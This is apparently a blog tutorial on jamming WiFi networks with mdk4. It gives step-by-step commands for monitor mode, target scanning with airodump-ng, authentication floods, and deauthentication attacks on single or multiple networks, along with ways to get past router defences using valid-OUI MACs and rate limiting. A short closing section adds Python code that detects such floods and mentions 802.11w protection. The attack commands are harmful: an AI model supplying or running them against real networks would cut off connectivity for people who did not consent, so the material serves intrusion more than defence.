One of the best and most powerful tools for ethical hackers in WiFi
penetration testing is mdk4. Its many options make it not only
feature-rich but also far more dangerous. I became speechless when I
explored the switches and capabilities of the mdk4 tool. mdk3 and aireplay-ng are
very popular tools for WiFi jamming, and mdk4 is an advanced, feature-rich
version of mdk3 developed by ASPj of k2wrlz and E7mer of
360PegasusTeam.
Note: Great power comes with great responsibility. Don't do anything
stupid with this tool that gets you into trouble. Before performing any
kind of attack, make sure you have permission from the network owner.
⚪How to install mdk4 in Linux?
If you know your Linux package manager, it's easy to
install any software/package/tool on any Linux distro. But here we are
going to perform a WiFi jamming attack, so we won't focus on the
Linux package manager. Below are the commands to install the mdk4, aircrack-ng and wireless tools packages for each Linux distribution.
①. Install mdk4 on Debian-based distros (Ubuntu, Kali, Parrot, Pop!_OS, MX Linux, Zorin OS, Sparky Linux, etc.)
sudo apt install -y wireless-tools mdk4 aircrack-ng
②. Install mdk4 on Arch-based distros (Manjaro, ArcoLinux, EndeavourOS, Artix, ArchLabs, Archman, etc.)
sudo pacman --noconfirm -S aircrack-ng mdk4 wireless_tools
⚪How to enable monitor mode in Linux?
There are many ways to turn on monitor mode on a WiFi network
adapter. I am going to add a monitor mode interface to my WiFi
adapter.
sudo iw wlan0 interface add mon type monitor
where wlan0 is the name of my WiFi adapter interface and mon is the name
I want to give the monitor mode interface on my WiFi adapter.
⚪How to capture wireless packets of wireless networks for a wireless attack?
There are many tools that allow us to dump the wireless network packets/frames
travelling around us. We are going to use one of the most popular
tools, airodump-ng. Airodump-ng has many options and switches that set
it apart from other tools. Since we are here to perform the wireless
jamming attack, we are not going into depth about it.
①. Capture all network packets/frames
sudo airodump-ng [MON-INTERFACE]
i.e,
sudo airodump-ng mon
When we run this command, our system captures all of the data packets
transmitted around us. We have to identify our target from
this output. After identifying the target, we must note its
BSSID, STATION, CHANNEL NUMBER, etc. for the later attack.
Note: I am going to select NoobGajen as my target network for this tutorial.
②. Capture the target network's packets/frames
From our first scan, we know our target wireless network's BSSID, CHANNEL
NUMBER and much more of the information we need for the attack, so we are
going to use it as needed. With the --bssid switch, the tool
captures only the packets of the wireless AP with the given
BSSID. This is very helpful for analyzing the activity of the target
network.
sudo airodump-ng [MON-INTERFACE] --bssid [BSSID]
Note: BSSID is the MAC address of the wireless network access point (the WiFi
network or any kind of wireless interface) to which the client/victim device is
currently connected. BSSID stands for Basic Service Set
Identifier.
i.e,
We already know the BSSID of the network from the first scan. I
selected NoobGajen as the target network, whose BSSID is 04:95:E6:98:6D:49.
sudo airodump-ng mon --bssid 04:95:E6:98:6D:49
③. Capture network packets/frames by channel
This tool also allows us to dump/capture/monitor wireless packets by
channel.
sudo airodump-ng [INTERFACE] -c [channel_number]
i.e,
As we already know, our target wireless network is running on channel number 5.
So I am going to put the channel number in place of [channel_number] in our
main command.
sudo airodump-ng mon -c 5
④. Save all the captured information
We can save our dumped/captured wireless packets by using the switch
"-w <file name>" in airodump-ng. You only have to replace <file name>
with the file name you want to use.
sudo airodump-ng [MON-INTERFACE] -w <file name>
i.e,
sudo airodump-ng mon -w myfilename
where mon is my [MON-INTERFACE] and myfilename is my <file name>.
A Denial-of-Service (DoS) attack is a malicious attack in which the attacker
sends such a massive amount of traffic to the network or server access point that
the server can't handle it, and that particular network
or service goes down temporarily. In some cases, the service also stays
down for a long period of time because the volume of traffic
exceeds the service's capacity to handle it. Here we
are going to perform a DoS attack on a wireless router network.
In this attack, we are going to use one of the most popular WiFi jamming
attack tools, mdk4. We are going to use the switch "a", which
generates random/fake MAC addresses and sends authentication frames to
all APs found within range of your WiFi adapter, which freezes the entire
WiFi network temporarily.
sudo mdk4 [MON-INTERFACE] a
Note: This attack doesn't disconnect clients from the network, but it turns
off the internet of the victim network by sending massive amounts of
traffic to the network.
i.e,
sudo mdk4 mon a
For this attack, we have to specify the target wireless network's BSSID or
SSID, and you must be within range of your target network for the attack to
succeed. Otherwise, the target network is still able to use the internet.
This method is the best way to turn off the internet connection of the
target network: only the target network is unable to use the internet.
Note: SSID is simply the wireless network name. The full form of SSID is
Service Set Identifier.
sudo mdk4 [MON-INTERFACE] a -a [BSSID]
i.e,
sudo mdk4 mon a -a 04:95:E6:98:6D:49
Some routers have a feature to differentiate between random/fake and
original MAC addresses. When they notice clients with fake MAC addresses
trying to connect, they reject those addresses. If your attack
gets rejected, you can bypass this by adding the -m option.
Note: -m sends packets from valid client MAC addresses from the built-in OUI
database.
sudo mdk4 [INTERFACE] a -m
i.e,
sudo mdk4 mon a -m
Sometimes the router is still able to prevent our attack, because it rejects a huge
number of packets at the wireless AP even after we apply the -m option (which
sends packets from valid client MAC addresses). We can then still bypass this by
controlling our packet speed with the -s option.
Note: We must specify the packet speed in packets per second (PPS) when using the -s
option. (Default: unlimited)
sudo mdk4 [INTERFACE] a -m -s [PPS]
i.e,
sudo mdk4 mon a -m -s 30
A DeAuth attack is a type of Denial-of-Service (DoS) attack that kicks
the client/victim off the wireless network or WiFi access point. It is also
known as a deauthentication attack on a wireless network. Now it is time to
perform these attacks on a wireless network.
sudo mdk4 [INTERFACE] d
i.e,
sudo mdk4 mon d
The mdk4 and mdk3 tools also provide features to DeAuth clients from wireless
APs by targeting specific wireless networks. You can also target an AP in whitelist
and blacklist mode, which is really amazing. You can easily. If you find it hard
to copy and paste the BSSID of your target network, you can also run this
attack using the SSID of the network.
sudo mdk4 [INTERFACE] d -E [SSID]
i.e,
sudo mdk4 mon d -E "RADMI NOTE 10 PRO MAX"
If we perform a DeAuth attack on a wireless network AP in whitelist mode,
only our target network's clients won't get disconnected, and the clients of
the rest of the networks will.
sudo mdk4 [MON-INTERFACE] d -W [BSSID]
i.e,
sudo mdk4 mon d -W 04:95:E6:98:6D:49
If we perform a DeAuth attack on a wireless network AP in blacklist
mode, only our target network's clients will get disconnected, and the clients of
the rest of the networks won't.
sudo mdk4 [MON-INTERFACE] d -B [BSSID]
i.e,
sudo mdk4 mon d -B 04:95:E6:98:6D:49
The mdk4 and mdk3 tools also allow their users to perform a DeAuth attack
on multiple networks in whitelist or blacklist mode at the same time.
To perform this attack, we have to create a file and add our target
networks' BSSIDs to it. I am going to create my file with the nano
text editor and add my target BSSIDs to that file.
The name of my file will be wifi.txt, and I am going to
add 04:95:E6:98:6D:49 and 88:B3:62:03:2A:F9.
③.i) How to perform a DeAuth attack by targeting multiple wireless networks in whitelist mode?
If we perform a DeAuth attack on wireless network APs in whitelist mode,
only our target networks' clients won't get disconnected, and the clients of
the rest of the networks will.
sudo mdk4 [MON-INTERFACE] d -w [file path]
i.e,
sudo mdk4 mon d -w wifi.txt
If we perform a DeAuth attack on wireless network APs in blacklist mode,
only our target networks' clients will get disconnected, and the clients of
the rest of the networks won't.
sudo mdk4 [MON-INTERFACE] d -b [file path]
i.e,
sudo mdk4 mon d -b wifi.txt
We can easily get our target's channel number from the airodump-ng commands
above. Once we know the target network's channel number, we can
perform the attack on that channel, and only the wireless networks
running on that specific channel are affected by this
attack.
sudo mdk4 [MON-INTERFACE] d -c [channel_number]
i.e,
sudo mdk4 mon d -c 5
Some routers reject our attack because we are sending a huge number
of DeAuth packets to the wireless AP. By customizing our packet speed, we
can bypass this protection.
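
From the defender's side, both floods described in this tutorial show up in captured management frames. The following is an added example, not part of the original tutorial: it counts distinct source MACs that authenticate but never associate (so it still fires when the sender uses vendor-looking MACs or a low packet rate) and counts deauthentication frames per BSSID. The frame tuples, MAC addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque

# IEEE 802.11 management-frame subtypes
ASSOC_REQ, AUTH, DEAUTH = 0x00, 0x0B, 0x0C
AP = "02:00:00:00:00:01"  # constructed BSSID (locally administered)

def detect_floods(frames, window=10.0, max_pending=20, max_deauth=30):
    """frames: time-ordered (ts, subtype, src, dst, bssid) tuples.
    Thresholds are illustrative assumptions. Returns {(kind, bssid)}."""
    auths = defaultdict(deque)      # bssid -> (ts, src) of recent auth frames
    associated = defaultdict(set)   # bssid -> MACs that went on to associate
    deauths = defaultdict(deque)    # bssid -> ts of recent deauth frames
    alerts = set()
    for ts, subtype, src, dst, bssid in frames:
        if subtype == ASSOC_REQ:
            associated[bssid].add(src)
        elif subtype == AUTH and src != bssid:
            q = auths[bssid]
            q.append((ts, src))
            while ts - q[0][0] > window:
                q.popleft()
            # Count distinct MACs, not frames: a slow flood still adds MACs
            pending = {mac for _, mac in q} - associated[bssid]
            if len(pending) > max_pending:
                alerts.add(("auth-flood", bssid))
        elif subtype == DEAUTH:
            q = deauths[bssid]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) > max_deauth:
                alerts.add(("deauth-flood", bssid))
    return alerts

def sample_benign():
    """Constructed: five clients authenticate, then associate."""
    frames = []
    for i in range(5):
        mac = f"02:aa:00:00:00:{i:02x}"
        frames += [(i * 2.0, AUTH, mac, AP, AP), (i * 2.0 + 0.1, ASSOC_REQ, mac, AP, AP)]
    return frames

def sample_attack():
    """Constructed: 30 auth frames/s from new MACs, then broadcast deauths."""
    auth = [(i / 30, AUTH, f"02:bb:00:00:00:{i:02x}", AP, AP) for i in range(90)]
    deauth = [(5 + i / 20, DEAUTH, AP, "ff:ff:ff:ff:ff:ff", AP) for i in range(60)]
    return auth + deauth

if __name__ == "__main__":
    print(detect_floods(sample_benign()), detect_floods(sample_attack()))
```

Forged deauthentication frames are what 802.11w Protected Management Frames are designed to reject, so a deauth-flood alert on a network without PMF is a prompt to enable it where the AP and clients support it.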